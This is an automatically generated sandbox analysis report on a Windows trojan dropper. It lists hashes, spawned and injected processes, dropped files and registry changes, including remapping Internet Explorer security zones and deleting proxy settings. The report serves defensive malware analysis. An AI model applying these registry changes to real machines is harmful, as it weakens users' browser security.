Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: f43a604241f2bb41d3ee1064890c23e1
SHA1: 056ba21a40e6beade3dc58fcd235e8a586f3adf6
SHA256: 544feaa02ef78f2468cea21c55a2573ca37249aad27b2fcc612fbd13b886491c
SSDeep: 3072:jQIURTXJeMMeGha2ppB6K58lAR0HhOv8W0Fb83:js9MtR8uyQv0B83
Size: 103077 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:46
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
nsh1D.tmp:260
nsh1D.tmp:1264
Bind.exe:776
amisid.exe:828
ppt.exe:1788
%original file name%.exe:1332
nsr1A.tmp:2012
nst16.tmp:264
nsw7.tmp:1224
nsn24.tmp:1984
setup3.exe:408
nsoB.tmp:284
setup3.tmp:1040
The Trojan injects its code into the following process(es):
avg18.exe:1888
adv_128.exe:1276
Mutexes
The following mutexes were created/opened:
ZonesLockedCacheCounterMutex
ZonesCounterMutex
ZonesCacheCounterMutex
RasPbFile
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
ShimCacheMutex
File activity
The process nsh1D.tmp:260 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\inetc.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\amisid.exe (909 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\post_reply.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\dummy.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\amisid.exe (0 bytes)
The process nsh1D.tmp:1264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\amisid.exe (909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\checks.txt (544 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\amisid.exe (0 bytes)
The process avg18.exe:1888 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\f9626892-7a78-3199-abd2-97bbce96297b\adv_128.exe (1188757 bytes)
The process %original file name%.exe:1332 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsn8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\pptxd[1].exe (47264 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\cmmdWriter[1].exe (6872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj27.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst16.tmp (36464 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa28.tmp (150707 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv29.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw7.tmp (6872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7121923af824073a25b2b7e6ba0a6e0e[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg5.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy25.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\prepreinstaller_win[1].exe (36464 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn24.tmp (47264 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn23.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1A.tmp (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\L5lD0nHnr[1].exe (9352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1B.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc14.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp (9352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\vos[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp (10646 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\wpesEcv[1].exe (150707 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (60 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj27.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa28.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy25.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn24.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv29.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
The process nsr1A.tmp:2012 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1E.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1D.tmp (8472 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Bundle_OperaRUnew[1].exe (8472 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nss1C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1E.tmp\inetc.dll (0 bytes)
The process nst16.tmp:264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\avg18.exe (40388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\SilentInstaller_dotnet4[1].exe (152993 bytes)
The process nsw7.tmp:1224 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi9.tmp (0 bytes)
The process nsn24.tmp:1984 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\setup3.exe (2420 bytes)
The process setup3.exe:408 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-IQVJP.tmp\setup3.tmp (7386 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-IQVJP.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-IQVJP.tmp\setup3.tmp (0 bytes)
The process nsoB.tmp:284 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nskE.tmp (3638 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nskD.tmp (0 bytes)
The process setup3.tmp:1040 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\baidu\is-GBLUE.tmp (36 bytes)
%Program Files%\baidu\unins000.dat (934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-1NTQ5.tmp\_isetup\_shfoldr.dll (23 bytes)
%Program Files%\baidu\is-KO5N5.tmp (34453 bytes)
%Program Files%\baidu\is-I042G.tmp (601 bytes)
%Program Files%\baidu\baidu.ini (65 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-1NTQ5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-1NTQ5.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-1NTQ5.tmp\_isetup (0 bytes)
Registry activity
The process nsh1D.tmp:260 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst20.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst20.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst22.tmp\registry.dll,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "S"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CD 19 20 A1 CD 54 BE 8E 33 25 ED 48 50 3D 3B 0C"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots that are not assigned to any other zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\InternetTurbo]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsh1D.tmp:1264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D 94 B2 1A EC 32 4B A1 02 33 A6 26 45 DB D1 E1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst20.tmp\registry.dll,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "M"
The process Bind.exe:776 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3D E0 96 39 2D 9D A7 C0 08 F8 D5 27 20 2D F5 48"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots that are not assigned to any other zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process avg18.exe:1888 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 A6 4A 1B FE 57 6D F7 DC D9 34 83 07 D6 1B 13"
The process amisid.exe:828 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"
[HKCU\Software\InternetTurbo]
"UID" = "C8318CA6891F5119A9FD96EC19E98D71"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 DE D2 21 3A 2B 57 7B 10 08 5A 27 F1 22 3C 52"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level" = ""
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level"
The process ppt.exe:1788 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 14 A3 8B BD 41 65 E5 B7 17 46 17 D1 E3 F6 4E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
